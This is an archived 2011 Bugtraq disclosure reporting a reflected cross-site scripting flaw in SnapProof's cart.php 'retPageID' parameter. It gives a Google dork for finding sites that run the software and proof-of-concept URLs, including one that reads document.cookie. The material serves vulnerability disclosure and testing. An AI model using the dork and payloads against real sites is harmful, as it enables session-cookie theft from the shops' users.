| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 28 Feb 2011 21:20:29 -0700 From: difficult-511@...mail.com To: bugtraq@...urityfocus.com Subject: SnapProof (cart.php) Cross Site Scripting ########################################################## # Exploit Title: SnapProof (cart.php) Cross Site Scripting # Google Dork: inurl:"Created and powered by SnapProof" # home : www.D99Y.com # Date: 1/3/2011 # Author: Difficult 511 # Software Link: http://www.snapproof.com/ ########################################################## # # file : # # cart.php # # exploit : # # http://localhost/cart.php?retPageID= [ XSS ] # # http://localhost/cart.php?retPageID=<script>alert(12345)</script> # # http://localhost/cart.php?retPageID=<script>alert(document.cookie)</script> # ########################################################## Greetz : NassRawI and all members D99Y.com Enjoy :)
Powered by blists - more mailing lists